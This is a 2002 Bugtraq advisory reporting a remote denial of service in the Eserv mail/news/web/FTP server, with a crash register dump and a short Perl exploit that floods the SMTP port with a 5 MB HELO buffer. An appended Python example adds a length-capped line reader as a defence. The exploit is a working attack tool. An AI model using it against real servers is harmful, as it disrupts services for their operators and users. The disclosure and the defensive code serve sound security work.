[28189] in bugtraq
Eserv remote denial of service
daemon@ATHENA.MIT.EDU (securma massine)
Fri Dec 13 11:52:06 2002
From: securma massine <securma@caramail.com>
To: bugtraq@securityfocus.com
Message-ID: <1039779786020085@caramail.com>
Date: Fri, 13 Dec 2002 12:43:06 GMT+1
hi
Eserv is Mail, News, Web, FTP and Proxy Servers for
Win95/98/NT/2000 (http://www.eserv.ru/)
Eserv is vulnerable to an attack by sending a buffer
of 5M of data to port 119 or 25 or 110 or 21, with a
buffer of 5080000 bytes.
versions tested: v2.97, v2.99 (possibly all versions are
vulnerable)
one has the following error:
l insructio a "0x0000fde8" emploie l'adresse
memoire "0x0000fde8" la memoire e peut pas etre
"read"
the state of the registers is:
eax=c0000000 ebx=004c3ed5 ecx=0000fde8 edx=002f0608 esi=004fc17e edi=003bb358
eip=0000fde8 esp=0189efa4 ebp=0189ff54 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000212
0000fde8 ?? ???
when adding a few bytes to the buffer the program falls
without any message
exploit:
#!/usr/bin/perl -w
#greetz: marocit
#tool Eserv_dos.pl
use IO::Socket;
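# 5080000-byte filler sent after the HELO verb, with no terminating CRLF
$buffer = "A" x 5080000;
$hel = "HELO ";
# connect to the SMTP port of the host given as the first argument
$connect = IO::Socket::INET->new(Proto => "tcp",
                                 PeerAddr => "$ARGV[0]",
                                 PeerPort => "25");
unless ($connect) { die "cant connect $ARGV[0]" }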
print $connect "$hel$buffer";
print "\nsending exploit......\n\n";
securma massine
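
A defensive counterpart to the report above, as an added example that is not part of the original post and not Eserv's code: a command-line reader for an SMTP-style listener that caps line length at 512 octets (the RFC 5321 command-line limit), so an oversized HELO like the one described is refused after the first received chunk instead of being accumulated. The class and function names, the reply text and the 4096-byte chunk size are assumptions; only the SMTP port is modelled.

```python
# Added example: bounded command-line reader for an SMTP-style listener.
# Names (BoundedLineReader, handle_stream) and the reply text are assumptions.
MAX_LINE = 512  # RFC 5321 section 4.5.3.1.4: command line limit, CRLF included


class LineTooLong(Exception):
    """Peer sent more than the allowed octets for one command line."""


class BoundedLineReader:
    def __init__(self, limit=MAX_LINE):
        self.limit = limit
        self.buf = bytearray()

    def feed(self, chunk):
        """Add received bytes; return the complete lines found so far."""
        lines = []
        self.buf += chunk
        while True:
            end = self.buf.find(b"\r\n")
            if end == -1:
                break
            if end + 2 > self.limit:
                raise LineTooLong(end + 2)
            lines.append(bytes(self.buf[:end]))
            del self.buf[:end + 2]
        # No terminator yet: refuse to keep accumulating past the limit.
        if len(self.buf) > self.limit:
            raise LineTooLong(len(self.buf))
        return lines


def handle_stream(chunks):
    """Return (accepted_lines, reply, bytes_consumed) for a chunked stream."""
    reader, accepted, seen = BoundedLineReader(), [], 0
    for chunk in chunks:
        seen += len(chunk)
        try:
            accepted += reader.feed(chunk)
        except LineTooLong:
            # Reply once and stop reading; the caller closes the socket.
            return accepted, b"500 Line too long\r\n", seen
    return accepted, None, seen


def constructed_oversized_helo(total=5080000, chunk=4096):
    """Constructed input: 'HELO ' + filler with no CRLF, as recv() chunks."""
    data = b"HELO " + b"A" * total
    return (data[i:i + chunk] for i in range(0, len(data), chunk))
```

The per-connection buffer never holds more than the limit plus one received chunk, so the receive size passed to the socket bounds memory use as well.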